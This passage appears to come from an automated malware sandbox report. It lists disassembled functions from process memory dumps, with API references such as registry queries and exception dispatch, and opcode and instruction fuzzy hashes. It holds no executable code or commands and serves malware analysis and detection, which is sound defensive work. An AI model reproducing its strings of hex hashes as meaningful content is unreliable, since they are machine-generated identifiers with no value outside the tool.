                                                                                                • Instruction ID: 1c74937022bb960c105a98ea118c7a57f793b9533c45a7e5c2e9f2fd32b1cd24
                                                                                                • Opcode Fuzzy Hash: 1c75080a6510c7af051f27aa679eaa6568ac8a48828f1a875ccf9355ff5ef64d
                                                                                                • Instruction Fuzzy Hash: 60D127B4A15219CBCB64EF20C89469CB7B6BF48304F6088EAD649A7340DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D90CC, Relevance: 3.3, APIs: 2, Instructions: 291COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 7e8ccbc62f2ac7183b84e3a68326034840f00c0622632d111d80e9aa000d954a
                                                                                                • Instruction ID: 62f855807127e06feb000815f658f80d2bcbde8f0ae7ea24d1b86c7e30184de3
                                                                                                • Opcode Fuzzy Hash: 7e8ccbc62f2ac7183b84e3a68326034840f00c0622632d111d80e9aa000d954a
                                                                                                • Instruction Fuzzy Hash: 1FD138B4A15215CFCB64AF20C85469CB7B6BF48304F6088EAD649A7350DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D9108, Relevance: 3.3, APIs: 2, Instructions: 286COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 5f38cdb545dc8275f564a56d340fddac2ebce730c167fabcdee83a2b7d263b42
                                                                                                • Instruction ID: c19eaa9abdc1ff82ec01d35da15bd466f7b01ccaae8d27a41f47a660f5e3c98d
                                                                                                • Opcode Fuzzy Hash: 5f38cdb545dc8275f564a56d340fddac2ebce730c167fabcdee83a2b7d263b42
                                                                                                • Instruction Fuzzy Hash: F6D128B4A15219CFCB64AF20C85469DB7B6BF48304F6088EAD649A7340DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D9150, Relevance: 3.3, APIs: 2, Instructions: 279COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: c76c79d276efe5beb85f31781491cc423865062be7950d49c5fe873167424d86
                                                                                                • Instruction ID: 6bb5bd6724d9bbc74cb83948d0b1807c7d960b512a66b68ad2b85ad3bc951bc5
                                                                                                • Opcode Fuzzy Hash: c76c79d276efe5beb85f31781491cc423865062be7950d49c5fe873167424d86
                                                                                                • Instruction Fuzzy Hash: E7C128B4A15219CFCB64AF20C89469DB7B6BF48304F6088EAD649A7340DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D9198, Relevance: 3.3, APIs: 2, Instructions: 272COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: b638bf930d3ff5b4431c7ee942d41415b8345d0ed848d1588083f7a4132f683a
                                                                                                • Instruction ID: d3b08eb57d3a0e5926d465195a7662c2aec88c282c50b130c1723e51202015e8
                                                                                                • Opcode Fuzzy Hash: b638bf930d3ff5b4431c7ee942d41415b8345d0ed848d1588083f7a4132f683a
                                                                                                • Instruction Fuzzy Hash: C4C129B4A15214CFCB64AB20C89469DB7B6BF88304F6088EAD649A7340DF349EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D91E0, Relevance: 3.3, APIs: 2, Instructions: 265COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: aa441518cf0d0eed68b1bf1fcdc2299ccd3de3983ec2504b22f8d00541e27586
                                                                                                • Instruction ID: 38dcc4c435d48959e4c44f6bcee6a2744239ca05cbcccd2d5d65d2d547046648
                                                                                                • Opcode Fuzzy Hash: aa441518cf0d0eed68b1bf1fcdc2299ccd3de3983ec2504b22f8d00541e27586
                                                                                                • Instruction Fuzzy Hash: 42C149B4A15214CFCB64EB20C89469DB7B6BF88304F6088EAD649A7340DF349EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D9228, Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: d822f7d76286acaac2165f35a4fb15fcffa7370fbc5cff0cb3161d544e50b01c
                                                                                                • Instruction ID: e854e5f8bf554feccf3cb1bb2ee59e9f5cf05c9109efd780a93fc59e88a94062
                                                                                                • Opcode Fuzzy Hash: d822f7d76286acaac2165f35a4fb15fcffa7370fbc5cff0cb3161d544e50b01c
                                                                                                • Instruction Fuzzy Hash: A8B149B4A15214CFCB64EB20C89469DB7B6BF88304F6088EAD649A7340DF349EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D9270, Relevance: 3.3, APIs: 2, Instructions: 251COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 4758de008b7df88bbf9368d9acb035477c01b48e62afb587b433e870da1ba6cd
                                                                                                • Instruction ID: 39b43e57fa2b4ab4b84d64e2664ae32c167f2b34e3efc4faac0187e32474fa64
                                                                                                • Opcode Fuzzy Hash: 4758de008b7df88bbf9368d9acb035477c01b48e62afb587b433e870da1ba6cd
                                                                                                • Instruction Fuzzy Hash: 51B149B4A14214CFCB64EB60C89469DB7B6BF88304F6088EAD649A7340DF349EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D92B8, Relevance: 3.2, APIs: 2, Instructions: 244COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: ea0bbe65cc02fdecf5fbaf5e01d1dd8a1d726d693d1e18708bf3fc5ce38ad3bb
                                                                                                • Instruction ID: 5d6561abd1702cb4d60ee517fae01381e3a6b6003c57ad928f686ad567d24fcd
                                                                                                • Opcode Fuzzy Hash: ea0bbe65cc02fdecf5fbaf5e01d1dd8a1d726d693d1e18708bf3fc5ce38ad3bb
                                                                                                • Instruction Fuzzy Hash: 2FB15AB4A14214CFCB64EB60C89469DB7B6BF88304F6088EAD649A7340DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D9300, Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 9838a309c728aeaab8e45da6d585279398ffc4d9f9b323764d2a3f4f9dae3c43
                                                                                                • Instruction ID: fe488978f4d48af61e22965c769daea7f75398dae3e241f3383c0057f3b98d9c
                                                                                                • Opcode Fuzzy Hash: 9838a309c728aeaab8e45da6d585279398ffc4d9f9b323764d2a3f4f9dae3c43
                                                                                                • Instruction Fuzzy Hash: 02A15BB4A14214CFCB64EB60C89469DB7B6BF88304F6088EAD609A7340DF349EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D933C, Relevance: 3.2, APIs: 2, Instructions: 230COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 6fcabee8228d1ecd571616330c86d4419a885424822689cdcc9dd4bc68e45181
                                                                                                • Instruction ID: 8e29e8c4e16b4a02570ae868189b860c9294f999f2858d5bc86d027591a98593
                                                                                                • Opcode Fuzzy Hash: 6fcabee8228d1ecd571616330c86d4419a885424822689cdcc9dd4bc68e45181
                                                                                                • Instruction Fuzzy Hash: 04A15AB4A14219CBCB64EB64C89479DB7B6BF88304F6088EAD209A7340DF349EC5DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D9384, Relevance: 3.2, APIs: 2, Instructions: 223COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: c385fc1c93ab107fea02ec6129bc6b04f0b109cf5ae4681a6a80ae0fb6eaf437
                                                                                                • Instruction ID: 533d72987bc28bb7be390c595a8e2a7d7f384adb6fccae7429d18aabcef5997a
                                                                                                • Opcode Fuzzy Hash: c385fc1c93ab107fea02ec6129bc6b04f0b109cf5ae4681a6a80ae0fb6eaf437
                                                                                                • Instruction Fuzzy Hash: 06A15AB4A14215CBCB64EB64C89479DB7B6BF88304F6088EAD209A7340DF349EC5DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D93CC, Relevance: 3.2, APIs: 2, Instructions: 216COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: fbd0d1e888823816b6e6d37347461329d5b1b71a97b43b7ff9f3ba929320a6c8
                                                                                                • Instruction ID: d83783e5a0531ce7b81813372ea9daa224e133a5f89abf51a8d33755423f400f
                                                                                                • Opcode Fuzzy Hash: fbd0d1e888823816b6e6d37347461329d5b1b71a97b43b7ff9f3ba929320a6c8
                                                                                                • Instruction Fuzzy Hash: E1915BB4A14215CBCB64EB64C89479DB7B6BF88304F6088EAD209A7340DF349EC5DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D9414, Relevance: 3.2, APIs: 2, Instructions: 209COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 845fd74257b4b028d57e4cb85831b28ba9cea4e175569a76bd541d2e6f2ede64
                                                                                                • Instruction ID: 7f5a6c6a5829a8eefbb098993ad80453ea147bbf7efed2262204e98515e1b420
                                                                                                • Opcode Fuzzy Hash: 845fd74257b4b028d57e4cb85831b28ba9cea4e175569a76bd541d2e6f2ede64
                                                                                                • Instruction Fuzzy Hash: 6F915AB4A14225CBCB64EB64C89479DB7B6BF88304F6088EAD209A7340DF349EC5DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D945C, Relevance: 3.2, APIs: 2, Instructions: 202COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 3a9cf6d4993fda1fbc4194327f65f70e5d9fce8fdbc97a61a3f40bf42d551bfa
                                                                                                • Instruction ID: 8ab4e4e0e819af3709d04f1c74b769715f834d4382f7fda69deb04b7fb3875a1
                                                                                                • Opcode Fuzzy Hash: 3a9cf6d4993fda1fbc4194327f65f70e5d9fce8fdbc97a61a3f40bf42d551bfa
                                                                                                • Instruction Fuzzy Hash: 92814BB4A14225CBCB64EB64C89479DB7B6BF88304F6088E9D209A7340DF349EC5DF59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D94BA, Relevance: 1.7, APIs: 1, Instructions: 191COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 5f632586ce511bb9a483457d4dcbcca61ceeed2d02c0bc52db238a74e3596562
                                                                                                • Instruction ID: 1ff25120696edaaa7be39927e1e6b59a5b7a801762f1b2146f37dbc291fc383e
                                                                                                • Opcode Fuzzy Hash: 5f632586ce511bb9a483457d4dcbcca61ceeed2d02c0bc52db238a74e3596562
                                                                                                • Instruction Fuzzy Hash: 55815AB4A14225CBCB64EB64C89479DB7B6BF88304F6088AAD109E7340DF349EC5DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0058094F, Relevance: 1.6, APIs: 1, Instructions: 111registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 00580A64
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359640340.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: Open
                                                                                                • String ID:
                                                                                                • API String ID: 71445658-0
                                                                                                • Opcode ID: 4da936df96f644bce6d5782d4448ddbe445b26e72e4fa9eff7be3151995d9b95
                                                                                                • Instruction ID: 39b54664b53dd9e388b32e9fcd59fcb36833870bd4ef17b0d13d4065380445e7
                                                                                                • Opcode Fuzzy Hash: 4da936df96f644bce6d5782d4448ddbe445b26e72e4fa9eff7be3151995d9b95
                                                                                                • Instruction Fuzzy Hash: 8F414A70E053898FDB14CFA9C444A9EBFF5BF49304F28856AD809AB286C7759849CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00580C0D, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00580CD1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359640340.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: QueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3660427363-0
                                                                                                • Opcode ID: c2987611c6fe49999f8da5b7988515b2674497e612d3ffc582b9f078bfdc0c47
                                                                                                • Instruction ID: 8ad70a5bdc6fb2b6da3b0b6d54807521f78b8b2b83585f1bebbd044ed613d1c6
                                                                                                • Opcode Fuzzy Hash: c2987611c6fe49999f8da5b7988515b2674497e612d3ffc582b9f078bfdc0c47
                                                                                                • Instruction Fuzzy Hash: DC41DFB1D012589FCB24DFA9C884ADEFFB5BF48300F25851AE819BB254C7709945CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00580C18, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00580CD1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359640340.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: QueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3660427363-0
                                                                                                • Opcode ID: 363c2d16ce80370bc8bd7ab7e0bca167d73e31fb336164a1c12f6933b18fff17
                                                                                                • Instruction ID: 1c11e752773311ac874e93eba666e1a701a3d28e77ebe3ff446cd8efc37cc484
                                                                                                • Opcode Fuzzy Hash: 363c2d16ce80370bc8bd7ab7e0bca167d73e31fb336164a1c12f6933b18fff17
                                                                                                • Instruction Fuzzy Hash: 3231D2B1D012589FCB20DF99C884A9EFFF5BF48310F15851AE818BB254C774A945CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 005809B0, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 00580A64
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359640340.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: Open
                                                                                                • String ID:
                                                                                                • API String ID: 71445658-0
                                                                                                • Opcode ID: 1a2f52e4425a8359f32af33a9c76c7ab9ffe425facb33b78742a872f98171a68
                                                                                                • Instruction ID: 387e0ffbd9b067ab73c5adabecd924b1761b81ad0a570212a85a0f3bd3485759
                                                                                                • Opcode Fuzzy Hash: 1a2f52e4425a8359f32af33a9c76c7ab9ffe425facb33b78742a872f98171a68
                                                                                                • Instruction Fuzzy Hash: E031F0B0D013498FDB14CF99C584A8EFFF5BF48304F28856AE809AB281C7759985CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00891898, Relevance: .3, Instructions: 315COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2360015955.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 92574d21259297bc9ef47fe9c95d03a14b45f54e3a4ffdc0d8614b239c784c56
                                                                                                • Instruction ID: 28f5834645f46d59154462c668b87925d8d37b1e40a4e442acd59015ae1e4cc2
                                                                                                • Opcode Fuzzy Hash: 92574d21259297bc9ef47fe9c95d03a14b45f54e3a4ffdc0d8614b239c784c56
                                                                                                • Instruction Fuzzy Hash: 1BB1E134B082088FCB14EBB4D858AADBBF6EF85304F148879E405DB795DB39DC4A8B51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 008914E8, Relevance: .3, Instructions: 284COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2360015955.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b85a125cff90cb8bf1b517bc49d6cb8c96edce0ed95b752d2ddd230d08152440
                                                                                                • Instruction ID: a825e6484be4d3aac4365ed660669e433f25c36b9704129d0b706183ff2f09b3
                                                                                                • Opcode Fuzzy Hash: b85a125cff90cb8bf1b517bc49d6cb8c96edce0ed95b752d2ddd230d08152440
                                                                                                • Instruction Fuzzy Hash: F9A13530B082469FCF15A7B8C8587A97BE2AF86300F1A84B9E446DB396DF34DC058752
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 008911C8, Relevance: .2, Instructions: 227COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2360015955.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 24b0373567d35fe5a1e7650a747018aa9434853ab79d4e03636f0ccde508ef37
                                                                                                • Instruction ID: 762a886833da25ca60e742e2267ec1739cec4227449c76cd07198975191407d4
                                                                                                • Opcode Fuzzy Hash: 24b0373567d35fe5a1e7650a747018aa9434853ab79d4e03636f0ccde508ef37
                                                                                                • Instruction Fuzzy Hash: 4871E6387140055BEF24B7E8E94876F369BE799704F244836E00AC77D4CF68CC8993A2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 008911D8, Relevance: .2, Instructions: 220COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2360015955.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b3967806046daf859ba3005b67ed7bd378be1921e96e82346496dfc95914a8d0
                                                                                                • Instruction ID: 016ee8af10953bc9593811990068cad0e0b1baf80e86e929619ebbb2ef435978
                                                                                                • Opcode Fuzzy Hash: b3967806046daf859ba3005b67ed7bd378be1921e96e82346496dfc95914a8d0
                                                                                                • Instruction Fuzzy Hash: 1F61C3387140055BEF24B7E8E94876F769BE799704F244835E00AD77D4CF68CC8993A2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0012D48C, Relevance: .1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359409862.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 545d398032784ecfd6ab2606881bf286139b708535878013cc8e5feb32e5d711
                                                                                                • Instruction ID: 945be13831bb703d71f8f8c5aca9ca9ce06d775505944bda914450b22fd6bb43
                                                                                                • Opcode Fuzzy Hash: 545d398032784ecfd6ab2606881bf286139b708535878013cc8e5feb32e5d711
                                                                                                • Instruction Fuzzy Hash: C7212575500244DFCB15DF10F8C0B26BFB6FB94328F24C569E8050B246C376D866CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0012D578, Relevance: .1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359409862.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 305e9123e9a8a6cc64b4908a01b321e0a875ca47f96ed6121a65e1bfd4d9d299
                                                                                                • Instruction ID: f0e541ca562feca11ca76b897e2ef5128ab0625a654dbf09622ec2b89fee6175
                                                                                                • Opcode Fuzzy Hash: 305e9123e9a8a6cc64b4908a01b321e0a875ca47f96ed6121a65e1bfd4d9d299
                                                                                                • Instruction Fuzzy Hash: 5A212275104244DFDB15CF50F9C4B2ABFA5FB98318F3485ADE8090B246C336D866CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0013D01C, Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359421865.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 96b38fd24956d833cecab2b80d998411105c3c44ed090ddae03d5c9b0104e7ff
                                                                                                • Instruction ID: 08a07ad81858c487449671e8dd44a66cdf24b4126c1c4c5853b2db42ac95caea
                                                                                                • Opcode Fuzzy Hash: 96b38fd24956d833cecab2b80d998411105c3c44ed090ddae03d5c9b0104e7ff
                                                                                                • Instruction Fuzzy Hash: 9321C275604244DFDB18DF64F884B26BBA5FB84B14F34C9ADE8494B246C336D847CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0013D006, Relevance: .1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359421865.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8ed30608f16516bb65b0359e2845c1c9ba2debd07d3c79d2fb533dd8cd20b247
                                                                                                • Instruction ID: 1b85cca28719febf0f2fee08a41750d4e08be8bddb3f9aaf2cc7d0dece832112
                                                                                                • Opcode Fuzzy Hash: 8ed30608f16516bb65b0359e2845c1c9ba2debd07d3c79d2fb533dd8cd20b247
                                                                                                • Instruction Fuzzy Hash: 462171754083809FCB06CF14E994715BFB1EB46314F28C5DAD8498F256C33AD816CB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0012D487, Relevance: .1, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359409862.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e980022154ab6591bee8661a65039797566f1f462bd756eda3a8fe93ccfbc6ab
                                                                                                • Instruction ID: 25269f7d22fc0c151734fbb3f5f3b9d537a7c7c3bfe75cc354e36f8a35039e0c
                                                                                                • Opcode Fuzzy Hash: e980022154ab6591bee8661a65039797566f1f462bd756eda3a8fe93ccfbc6ab
                                                                                                • Instruction Fuzzy Hash: 0F11D376504280CFCB02CF10E5C4B16BF72FB94314F24C6A9D8094B656C37AD966CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0012D573, Relevance: .1, Instructions: 56COMMON
                                                                                                Download Yara Rule
